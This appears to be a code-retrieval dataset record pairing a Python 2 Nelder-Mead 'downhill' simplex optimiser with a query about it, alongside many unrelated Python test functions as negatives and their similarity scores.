responses.GET,\n oauth1_utils.CustomApiClient.OAUTH1_SERVER_REQUEST_TOKEN, # /authority/oauth1/request_token\n callback=callback__request_token,\n )\n rsps.add_callback(\n responses.GET,\n oauth1_utils.CustomApiClient.OAUTH1_SERVER_ACCESS_TOKEN, # /authority/oauth1/access_token\n callback=callback__access_token,\n )\n\n # the following were originally handled via `requests.get` but migrated to direct webtest queries\n #\n # rsps.add_callback(\n # responses.GET, OAUTH1__URL_AUTHORITY_AUTHENTICATE, # /authority/oauth1/authorize\n # callback=callback__authenticate_get,\n # )\n # rsps.add_callback(\n # responses.POST, OAUTH1__URL_AUTHORITY_AUTHENTICATE, # /authority/oauth1/authorize\n # callback=callback__authenticate_post,\n # )\n # rsps.add_callback(\n # responses.GET, oauth1_model.OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK, # https://example.com/application/flow-register/authorized-callback\n # callback=callback__callback,\n # )\n # rsps.add_callback(\n # responses.GET, oauth1_model.OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK_SUCCESS, # https://example.com/application/flow-register/authorized-callback-success\n # callback=callback__callback_success,\n # )\n\n #\n # actual test flow...\n #\n\n # first we need to log into the oAuth1 Authority\n # the authority is the account which will be the oAuth identity provider (e.g. Twitter)\n\n # User visit\n res = self.testapp_authority.get(\n \"/authority/account/login-form\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n assert res.text == \"authority|login-form\"\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n\n # User visit\n res = self.testapp_authority.get(\n \"/authority/account/login-submit\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=303,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /authority/account/home; you should be redirected automatically.\\n\\n\"\"\"\n )\n\n # User visit\n res = self.testapp_authority.get(\n \"/authority/account/home\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=200,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n assert (\n res.text\n == \"authority|home|user=%s\" % oauth1_model.USERID_ACTIVE__AUTHORITY\n )\n\n #\n # now we want to visit the application\n #\n\n # User visit's the application\n #\n res = self.testapp_app.get(\n \"/application/flow-register\",\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n test_env[\"requests_session_app\"].cookies.update(\n self.testapp_app.cookies\n ) # update the session with the cookies from the response\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /application/flow-register/oauth1/start; you should be redirected automatically.\\n\\n\"\"\"\n )\n\n # User visit\n # however, it makes a behind the scenes visit to\n # * /authority/oauth1/request_token\n res = self.testapp_app.get(\n \"/application/flow-register/oauth1/start\",\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n test_env[\"requests_session_app\"].cookies.update(\n self.testapp_app.cookies\n ) # update the session with the cookies from the response\n assert \"Location\" in res.headers\n url_auth = res.headers[\"Location\"]\n assert res.headers[\"Location\"].startswith(\n OAUTH1__URL_AUTHORITY_AUTHENTICATE\n )\n\n # resAuthInbound = test_env['requests_session_authority'].get(url_auth)\n # then the user is redirected to the authority to approve\n qs = url_auth.split(\"?\")[1]\n url_auth_local = \"/authority/oauth1/authorize?%s\" % qs\n resAuthInbound = self.testapp_authority.get(\n url_auth_local, extra_environ=test_env[\"extra_environ_authority\"]\n )\n assert (\n '<form action=\"/authority/oauth1/authorize\" method=\"POST\" id=\"app-action-authorize\">'\n in resAuthInbound.text\n )\n csrfs = re_csrf.findall(resAuthInbound.text)\n assert len(csrfs) == 2 # submit, deny\n tokens = re_token.findall(resAuthInbound.text)\n assert len(tokens) == 2 # submit, deny\n\n payload = {\n \"csrf_\": csrfs[0],\n \"oauth_token\": tokens[0],\n \"submit\": \"authorize\",\n }\n # payload = {'csrf_': csrfs[0], 'oauth_token': tokens[0], 'submit': 'authorize', }\n\n # visited by USER: Authorize the application on the Authority\n resAuthApprove = self.testapp_authority.post(\n \"/authority/oauth1/authorize\",\n payload,\n extra_environ=test_env[\"extra_environ_authority\"],\n status=302,\n )\n test_env[\"requests_session_authority\"].cookies.update(\n self.testapp_authority.cookies\n ) # update the session with the cookies from the response\n\n # visited by USER: redirected to the callback page on the APPLICATION\n assert \"Location\" in resAuthApprove.headers\n url_callback = resAuthApprove.headers[\"Location\"]\n assert url_callback.startswith(OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK)\n qs = url_callback.split(\"?\")[1]\n url_callback_local = (\n \"/application/flow-register/authorized-callback?%s\" % qs\n )\n resAuthCallback = self.testapp_app.get(\n url_callback_local,\n extra_environ=test_env[\"extra_environ_app\"],\n status=303,\n )\n\n # visited by USER: redirected to the callback-success page on the APPLICATION\n assert \"Location\" in resAuthCallback.headers\n url_callback_success = resAuthCallback.headers[\"Location\"]\n assert url_callback_success.startswith(\n OAUTH1__URL_APP_FLOW_REGISTER_CALLBACK_SUCCESS\n )\n assert len(url_callback_success.split(\"?\")) == 1\n url_callback_success_local = (\n \"/application/flow-register/authorized-callback-success\"\n )\n resAuthCallbackSuccess = self.testapp_app.get(\n url_callback_success_local,\n extra_environ=test_env[\"extra_environ_app\"],\n status=200,\n )\n assert (\n resAuthCallbackSuccess.text\n == \"application|register|authorized-callback-success|user=%s\"\n % oauth1_model.USERID_ACTIVE__APPLICATION\n )\n\n # ensure logout, just to be safe\n res = self.testapp_authority.get(\n \"/authority/account/logout\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=303,\n )\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /authority/account/login-form; you should be redirected automatically.\\n\\n\"\"\"\n )\n\n res = self.testapp_authority.get(\n \"/authority/account/home\",\n extra_environ=test_env[\"extra_environ_authority\"],\n status=303,\n )\n assert (\n res.text\n == \"\"\"303 See Other\\n\\nThe resource has been moved to /authority/account/login-form; you should be redirected automatically.\\n\\n\"\"\"\n )", "def test_case02(self):\n # Clear out collection\n url = \"http://localhost:3001/api/clear\"\n resp = requests.delete(url)\n\n url = \"http://localhost:3001/api/add-transaction\"\n\n data = {\"payer\": \"Kyle\", \"points\": 5000,\n \"timestamp\": \"2020-11-02T14:00:00Z\"}\n resp = requests.post(url, json=data)\n\n url = \"http://localhost:3001/api/spend-points\"\n data = {\"points\": 3000}\n resp = requests.post(url, json=data)\n\n url = \"http://localhost:3001/api/get-balances\"\n resp = requests.get(url)\n\n expected_result = {\n \"Kyle\": 2000\n }\n self.assertEqual(resp.json(), expected_result)", "def test_case04(self):\n # Clear out collection\n url = \"http://localhost:3001/api/clear\"\n resp = requests.delete(url)\n\n url = \"http://localhost:3001/api/add-transaction\"\n\n data = {\"payer\": \"Kyle\", \"points\": 500,\n \"timestamp\": \"2020-11-02T14:00:00Z\"}\n resp = requests.post(url, json=data)\n\n data = {\"payer\": \"John\", \"points\": 500,\n \"timestamp\": \"2020-11-02T14:00:00Z\"}\n resp = requests.post(url, json=data)\n\n url = \"http://localhost:3001/api/get-balances\"\n resp = requests.get(url)\n\n url = \"http://localhost:3001/api/spend-points\"\n data = {\"points\": 1500}\n resp = requests.post(url, json=data)\n\n expected_result = {\n \"err\": \"Not enough points\"\n }\n self.assertEqual(resp.json(), expected_result)", "def test_authflow(self):\n response = self.client.post('/auth/signup/', {\n 'first_name': 'John',\n 'last_name': 'Doe',\n 'email': '[email protected]',\n 'password': self.password,\n 'gstin': '11AAAAA1111A1A1',\n 'mobile': self.mobile,\n 'business_name': 'busi_ness',\n 'address': {'address_name':'', 'address_line1': '', 'address_line2': '', 'state': '', 'pincode': '209801', 'country': 'INDIA'}\n })\n\n response_data = response.json()\n\n self.assertListEqual(list(response_data.keys()), ['id', 'otp'])\n\n response = self.client.post('/auth/verify-otp/', response_data)\n\n response_data = response.json()\n self.assertListEqual(list(response_data.keys()), ['token', 'refresh_token', 'session_key'])\n self.assertRegexpMatches(response_data['token'], r'[0-9A-Za-z\\-]+\\.[0-9A-Za-z\\-]+\\.[0-9A-Za-z\\-]+')\n self.assertRegexpMatches(response_data['refresh_token'], r'[0-9A-Za-z]{32}')\n self.assertRegexpMatches(response_data['session_key'], r'[0-9A-Za-z]{32}')\n\n response = self.client.post('/auth/signin/', {'id_field': self.mobile, 'password': self.password})\n auth_data = response.json()\n\n refresh_token = auth_data['refresh_token']\n session_key = auth_data['session_key']\n\n response = self.client.post('/auth/refresh/', {'refresh_token': refresh_token}, HTTP_AUTHORIZATION='JWT ' + auth_data['token'], HTTP_X_SESSION_KEY=session_key)\n\n refreshed_auth_data = response.json() \n response = self.client.get('/auth/handle-sessions/', HTTP_AUTHORIZATION='JWT ' + refreshed_auth_data['token'], HTTP_X_SESSION_KEY=session_key)\n\n active_sessions = response.json()\n self.assertListEqual(list(active_sessions.keys()), ['token_list'])\n\n acitve_sessions_token_list = active_sessions.get('token_list')\n\n # end all other sessions except your own\n for session_key_iter in acitve_sessions_token_list:\n if session_key_iter != session_key:\n self.client.post('/auth/handle-sessions/', {'session_key': session_key_iter}, HTTP_AUTHORIZATION='JWT ' + refreshed_auth_data['token'], HTTP_X_SESSION_KEY=session_key)\n\n # log out from own session\n self.client.get('/auth/signout/', HTTP_AUTHORIZATION='JWT ' + refreshed_auth_data['token'], HTTP_X_SESSION_KEY=session_key)", "def test_ab_success_twoclients(self):\n fixture_file = 'fixtures/simple/ab_success_twoclients.json'\n events = self.run_and_get_events(fixture_file)\n\n expected_events = [\n ('on_b_dial', {\n 'caller': 'SIP/260010001-00000015',\n 'targets': ['SIP/voipgrid-siproute-docker-00000016'],\n }),\n ('on_b_dial', {\n 'caller': 'SIP/voipgrid-siproute-docker-00000017',\n 'targets': ['SIP/150010001-00000018'],\n }),\n ('on_up', {\n 'caller': 'SIP/voipgrid-siproute-docker-00000017',\n 'target': 'SIP/150010001-00000018',\n }),\n ('on_up', {\n 'caller': 'SIP/260010001-00000015',\n 'target': 'SIP/voipgrid-siproute-docker-00000016',\n }),\n ('on_hangup', {\n 'caller': 'SIP/voipgrid-siproute-docker-00000017',\n 'reason': 'completed',\n }),\n ('on_hangup', {\n 'caller': 'SIP/260010001-00000015',\n 'reason': 'completed',\n }),\n ]\n\n self.assertEqualChannels(expected_events, events)", "def test_WINNF_FT_S_REG_2(self):\n\n # Pre-load conditional parameters\n device_b = json.load(\n open(os.path.join('testcases', 'testdata', 'device_b.json')))\n self._sas_admin.InjectFccId({'fccId': device_b['fccId']})\n conditionals_b = {\n 'cbsdCategory': 'B', 'fccId': device_b['fccId'],\n 'cbsdSerialNumber': device_b['cbsdSerialNumber'],\n 'airInterface': device_b['airInterface'], \n 'installationParam': device_b['installationParam']}\n conditionals = {'registrationData': [conditionals_b]}\n self._sas_admin.PreloadRegistrationData(conditionals)\n # Register the device\n del device_b['cbsdCategory']\n del device_b['airInterface']\n del device_b['installationParam']\n request = {'registrationRequest': [device_b]}\n response = self._sas.Registration(request)['registrationResponse'][0]\n # Check registration response\n self.assertTrue('cbsdId' in response)\n self.assertFalse('measReportConfig' in response)\n self.assertEqual(response['response']['responseCode'], 0)", "async def test_multiple_different_state(hass):\n calls_1 = async_mock_service(hass, DOMAIN, SERVICE_TURN_ON)\n calls_2 = async_mock_service(hass, DOMAIN, SERVICE_TURN_OFF)\n\n await async_reproduce_states(hass, [\n State(ENTITY_1, 'on'),\n State(ENTITY_2, 'off'),\n ])\n\n await hass.async_block_till_done()\n\n assert len(calls_1) == 1\n assert calls_1[0].data == {'entity_id': ENTITY_1}\n assert len(calls_2) == 1\n assert calls_2[0].data == {'entity_id': ENTITY_2}", "async def test_list_fleet(client):\n group_param = {}\n params = [('access_token', 'access_token_example'),\n ('starting_after', 'starting_after_example'),\n ('ending_before', 'ending_before_example'),\n ('limit', 56)]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/list',\n headers=headers,\n json=group_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_api_predictor_events_get(self):\n pass", "def test_search_route_instance_entry(self, mock_execute_cli_command_on_device):\n mock_device_ins = mock.Mock()\n\n print(\"search master instance info from HA topo\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search master instance from previous result\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE\"])\n self.ins.runtime[\"route_instance_entry_list\"] = self.ins.get_route_instance_entry(mock_device_ins)\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n match_from_previous_response=True,\n return_mode=\"counter\",\n instance_name=\"master\",\n instance_rib_irib_active_count=22,\n instance_rib_irib_hidden_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with brief and not interested counter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_BRIEF\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=1,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 1)\n\n print(\"search instance info with detail\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_DETAIL\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=18,\n instance_rib_irib_holddown_count=0,\n )\n self.assertTrue(response)\n\n print(\"search instance info but entry don't have related parameter\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n instance_type=\"forwarding\",\n instance_state=(\"Active\", \"in\"),\n instance_rib_irib_active_count=22,\n instance_rib_irib_holddown_count=0,\n )\n self.assertFalse(response)\n\n print(\"search instance info with extensive\")\n mock_execute_cli_command_on_device.return_value = self.xml.xml_string_to_dict(self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"])\n response = self.ins.search_route_instance_entry(\n mock_device_ins,\n return_mode=\"counter\",\n instance_type=\"forwarding\",\n instance_rib_irib_active_count=0,\n instance_rib_irib_holddown_count=0,\n )\n self.assertEqual(response, 16)", "def test_basic_remove_one_of_multiple_endpoint(self):\n args = self.get_args()\n config = self.create_config_file()\n self.write_config_file(config, args)\n execute_tool(args, test_mode=True)\n\n time.sleep(2)\n mac1 = '00:11:22:33:33:34'\n ip1 = '3.4.3.5'\n self.add_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n mac2 = '00:11:22:33:33:35'\n ip2 = '3.4.3.6'\n self.add_endpoint(mac2, ip2, 'intersite-testsuite', 'app', 'epg')\n time.sleep(2)\n\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n\n self.remove_endpoint(mac1, ip1, 'intersite-testsuite', 'app', 'epg')\n self.assertFalse(self.verify_remote_site_has_entry_with_provided_contract(mac1, ip1, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))\n self.assertTrue(self.verify_remote_site_has_entry_with_provided_contract(mac2, ip2, 'intersite-testsuite', 'l3out',\n 'intersite-testsuite-app-epg', 'contract-1'))", "def test_multihop_receiver_on_success(vo, did_factory, root_account, caches_mock, metrics_mock):\n receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'all_vos': True, 'total_threads': 1})\n receiver_thread.start()\n\n try:\n src_rse = 'XRD1'\n src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)\n jump_rse = 'XRD3'\n jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)\n dst_rse = 'XRD4'\n dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)\n\n all_rses = [src_rse_id, jump_rse_id, dst_rse_id]\n\n did = did_factory.upload_test_file(src_rse)\n rule_priority = 5\n rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=3600, locked=False, subscription_id=None, priority=rule_priority)\n submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=0, transfertype='single', filter_transfertool=None)\n\n request = __wait_for_state_transition(dst_rse_id=jump_rse_id, run_poller=False, **did)\n assert request['state'] == RequestState.DONE\n request = __wait_for_state_transition(dst_rse_id=dst_rse_id, run_poller=False, **did)\n assert request['state'] == RequestState.DONE\n\n fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query({request['external_id']: {request['id']: request}})\n assert fts_response[request['external_id']][request['id']].job_response['priority'] == rule_priority\n\n # Two hops; both handled by receiver\n assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 2\n finally:\n receiver_graceful_stop.set()\n receiver_thread.join(timeout=5)\n receiver_graceful_stop.clear()", "def test_get(self, app, data_queues, metricsmock, logs):\n res = self._call(app, ip=self.test_ip, method=\"get\", status=200)\n self.check_response(data_queues, res, \"ok\")\n self.check_queue(data_queues, 0)\n\n metricsmock.assert_incr_once(\n \"request\", tags=[self.metric_path, \"method:get\", \"status:200\"]\n )\n metricsmock.assert_timing_once(\n \"request.timing\", tags=[self.metric_path, \"method:get\"]\n )\n\n log = logs.only_entry\n expected_entry = {\n # accuracy is low for region API fixture, and medium for geolocate\n # see bound_model_accuracy and related tests for direct calculation\n \"accuracy\": logs.only_entry[\"accuracy\"],\n \"accuracy_min\": \"low\",\n \"api_key\": \"test\",\n \"api_path\": self.metric_path.split(\":\")[1],\n \"api_type\": self.metric_type,\n \"blue\": 0,\n \"blue_valid\": 0,\n \"cell\": 0,\n \"cell_valid\": 0,\n \"duration_s\": log[\"duration_s\"],\n \"event\": f\"GET {self.url} - 200\",\n \"fallback_allowed\": False,\n \"has_geoip\": True,\n \"has_ip\": True,\n \"http_method\": \"GET\",\n \"http_path\": self.url,\n \"http_status\": 200,\n \"log_level\": \"info\",\n \"region\": \"GB\",\n \"result_status\": \"hit\",\n \"source_geoip_accuracy\": log[\"accuracy\"],\n \"source_geoip_accuracy_min\": \"low\",\n \"source_geoip_status\": \"hit\",\n \"wifi\": 0,\n \"wifi_valid\": 0,\n }\n if self.metric_type == \"locate\":\n expected_entry[\"api_key_count\"] = 1\n expected_entry[\"api_response_sig\"] = log[\"api_response_sig\"]\n assert log == expected_entry", "def test_tick(requests_mock, test_operator):\n tick_url = (\"https://habitica.com/api/v3/tasks/{}/score/up\"\n \"\".format(\"963e2ced-fa22-4b18-a22b-c423764e26f3\"))\n test_operator.tick_task(\"Test habit\")\n\n assert len(requests_mock.request_history) == 2\n tick_request = requests_mock.request_history[1]\n assert tick_url in tick_request.url" ]
[ "0.8359559", "0.81559026", "0.72383404", "0.68315816", "0.6380493", "0.6169041", "0.6073902", "0.60261333", "0.5987054", "0.59616095", "0.5898319", "0.5815202", "0.5773632", "0.5772734", "0.5764194", "0.57637644", "0.57477325", "0.57452106", "0.5725453", "0.569496", "0.5665655", "0.5647996", "0.56366545", "0.56273544", "0.56137824", "0.5607153", "0.56039715", "0.5602627", "0.5594197", "0.55892146", "0.5578428", "0.5578371", "0.55735224", "0.55731857", "0.5571376", "0.55648065", "0.556008", "0.55591875", "0.55530953", "0.553583", "0.5532179", "0.55273837", "0.5520228", "0.55129105", "0.55085075", "0.5503457", "0.54881245", "0.5485791", "0.54811996", "0.5466031", "0.5457292", "0.54563856", "0.5450073", "0.5447791", "0.5424676", "0.54233456", "0.541368", "0.5411077", "0.54106784", "0.5407653", "0.5406448", "0.54052997", "0.54049206", "0.5402397", "0.5394926", "0.53887737", "0.5384184", "0.53777957", "0.5373209", "0.5369995", "0.5368923", "0.53688973", "0.53675365", "0.5366093", "0.5352934", "0.5349881", "0.5340009", "0.5337039", "0.53368795", "0.5332174", "0.5330028", "0.53298277", "0.5327503", "0.53239244", "0.5323187", "0.53224766", "0.5322067", "0.5319102", "0.5313876", "0.5304917", "0.53032184", "0.52909994", "0.5290603", "0.52899843", "0.5287654", "0.52858424", "0.5282592", "0.5273523", "0.5266585", "0.52594477" ]
0.76799375
2
Downhill algorithm as described in Kiusalaas Numerical Methods in Engineering with Python 3
def downhill(F, xStart, args=None, side=0.1, ftol=1.0e-6, xtol=1.0e-6, maxiter=1000, maxfunc=1000, maxiternochange=10): # TODO: check the types of the input ??? # print "Entering downhill" n = len(xStart) x = np.zeros((n+1, n), dtype=float) #point null matrix, n+1 rows, n columns f = np.zeros(n+1, dtype=float) # null vector, n+1 columns p_count = 0 # counter for detecting a plateau f_count = 0 # counter for the number of function call f_best_count = 0 # counter for the number of iterations in which the best solution does not change f_best_prev = 0.0 # holds the best value from the previous iteration epsilon = 0.001 # tolerance for considering two values as equal # max_iter_no_change = 10 # maximum number of accepted iterations with no change in the optimal solution precision = 2 round_map = partial(round, ndigits=precision) # partial function for rounding purposes # initial simplex x[0] = xStart for i in xrange(1, n+1): x[i] = xStart x[i,i-1] = xStart[i-1] + side # print "Evaluate the starting points" # compute the value of F at the vertices of the simplex for i in xrange(n+1): f[i] = F(x[i], args) # p_count += 1 # main loop # print "Start iterating" for k in xrange(maxiter): # check the number of function calls if f_count > maxfunc: print "Stopping criteria: maximum number of function calls" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'MAXFUNCALL'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'MAXFUNCALL'} # find the best and worst vertex (consider a minimization problem) iLo = np.argmin(f) # best vertex iHi = np.argmax(f) # worst vertex # print k," ", f[iLo] # # if f[iLo] < -0.310000: # print f[iLo] # print x[iLo] # print x # sys.exit(1) # print "k: ", k, " f_best_prev: ", f_best_prev, " f[iLo]: ", f[iLo], " f_best_count: ", f_best_count # print "Beginning of iteration: %4d | Best x: %4f %4f %4f | Best value: %f" % (k, x[iLo][0], x[iLo][1], x[iLo][2], f[iLo]) # print "x: ", x, " f: ", f # print "=========================================================================================" # check if the solution has changed from the previous iterations if f[iLo] < f_best_prev: f_best_prev = f[iLo] f_best_count = 0 else: f_best_count += 1 if f_best_count > maxiternochange: print "Stopping criteria: maximum number of iterations with no improvement in the best solution" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'NOIMPROVEMENT'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'NOIMPROVEMENT'} if abs(f[iLo] - f[iHi]) < ftol: # If difference between highest and lowest is smaller than ftol, return print "Stopping criteria: difference between highest and lowest points is smaller than tolerance" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'MAXTOLERANCE'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'MAXTOLERANCE'} # compute the move vector d d = (-(n+1) * x[iHi] + np.sum(x, axis=0)) / n # print "d: ", d # check for convergence if sqrt(np.dot(d, d)/n) < xtol: # length of the vector d print "Stopping criteria: length of step d smaller than tolerance" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'SMALLSTEP'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'SMALLSTEP'} # try reflection xNew = np.array(map(round_map, x[iHi] + 2 * d)) fNew = F(xNew, args) f_count += 1 # print "Reflected point: ", xNew, " value: ", fNew # check for no improvement over the worst point # and for plateau condition if f[iHi] - epsilon <= fNew <= f[iHi] + epsilon: p_count += 1 # print "No improvement here" if p_count == n+2: # we reflected all vertices with no improvement print "Stopping criteria: Probably we landed on a plateau... exiting" # TODO: restart instead of exiting print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'PLATEAU'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'PLATEAU'} else: p_count = 0 if fNew <= f[iLo]: # if the new value is better than the best so far, x[iHi] = xNew # substitute the worst vertex with the new one f[iHi] = fNew # try to expand the reflection xNew = np.array(map(round_map, x[iHi] + d)) fNew = F(xNew, args) f_count += 1 # print "Expanded point: ", xNew, " value: ", fNew if fNew <= f[iHi]: # in the original source version it is f[iLo] (?) x[iHi] = xNew f[iHi] = fNew else: # try reflection again if fNew <= f[iHi]: x[iHi] = xNew f[iHi] = fNew else: # try contraction xNew = np.array(map(round_map, x[iHi] + 0.5 * d)) fNew = F(xNew, args) f_count += 1 # print "Contracted point: ", xNew, " value: ", fNew if fNew <= f[iHi]: # accept contraction x[iHi] = xNew f[iHi] = fNew else: # shrink for i in xrange(len(x)): if i != iLo: x[i] = np.array(map(round_map, x[i] - x[iLo] * 0.5)) f[i] = F(x[i], args) f_count += 1 # print "End of iteration: %4d | Best x: %4f %4f %4f | Best value: %f" % (k, x[iLo][0], x[iLo][1], x[iLo][2], f[iLo]) # print "x: ", x, " f: ", f # print "*"*50 # print "" print "Stopping criteria: maximum number of iterations" print "Best solution so far: ", x[iLo], " value: ", f[iLo], " at iteration:", k # return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': (args['Q1'], args['Q2'], args['Q3']), 'stopping': 'MAXITERATION'} return {'point' : x[iLo], 'value': f[iLo], 'iteration': k, 'funcalls': f_count, 'allocation': [args['Q{}'.format(h)] for h in xrange(1, args['retailers']+1)], 'stopping': 'MAXITERATION'}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def solution(A):\n \"\"\"method 2 n**2\n east=[] #0\n west=[] #1\n for i in range(len(A)):\n if A[i] == 0:\n east.append(i)\n else:\n west.append(i)\n\n result = 0\n for e in east:\n count = 0\n for j in range(len(west)):\n if e > west[j]:\n continue\n if e < west[j]:\n count = len(west) - j\n result += count\n #print(e, count)\n break\n return result\n \"\"\"\n east=[] #0\n west=[] #1\n l = len(A)\n for i in range(len(A)):\n if A[i] == 0:\n east.append(i)\n else:\n west.append(i)\n\n result = {}\n for i in range(len(east)):\n e = east[i]\n if i == 0:\n result[e] = l - e - len(east)\n if i != 0:\n result[e] = result[east[i-1]] - (e - east[i-1]-1)\n\n #print(result)\n s = sum(result.values())\n if s > 1000000000:\n return -1\n return s", "def fwht(X):\n n = X.shape[0]\n # number of stages\n s = (n-1).bit_length()\n\n def init1():\n Y = jnp.empty(X.shape, dtype=X.dtype)\n A = X[0::2]\n B = X[1::2]\n Y = Y.at[0::2].set(A + B)\n Y = Y.at[1::2].set(A - B)\n return (Y, 1, 2, 4)\n\n def body1(state):\n # gap between x entries\n # number of x entries\n X, count, gap, step = state\n Y = jnp.empty(X.shape, dtype=X.dtype)\n J = 0\n k = 0\n def body2(state):\n Y, J, k = state\n def body3(state):\n Y, j, k = state\n # compute the four parts\n a = X[j]\n b = X[j+gap]\n c = X[j+1]\n d = X[j+1+gap]\n Y = Y.at[k].set(a+b)\n Y = Y.at[k+1].set(a-b)\n Y = Y.at[k+2].set(c-d)\n Y = Y.at[k+3].set(c+d)\n return (Y, j+2, k+4)\n def cond3(state):\n j = state[1]\n return j < J+gap-1\n # the loop\n init3 = (Y, J, k)\n Y, j, k = lax.while_loop(cond3, body3, init3)\n return (Y, J + step, k)\n\n def cond2(state):\n k = state[2]\n return k < n - 1\n\n init2 = Y, J, 0\n Y, J, k = lax.while_loop(cond2, body2, init2)\n\n return (Y, count+1, 2*gap, 2*step)\n\n def cond1(state):\n count = state[1]\n return count < s\n\n state = lax.while_loop(cond1, body1, init1())\n return state[0]", "def eulerBuckle(dim):\n bst = dim[0]\n tst = dim[1]\n tsk = dim[2]\n\n ZEAZ = (Est*bst*tst*((tsk/2)+(bst/2)))\n ZEA = (Est*bst*tst)+(Esk*tsk*bsk)\n zbar = ZEAZ/ZEA # Neutral Axis\n\n EIbar = ((Esk*bsk*(tsk**3))/12)+(Esk*bsk*tsk*(zbar**2))+((Est*tst*bst**3)/12)+\\\n 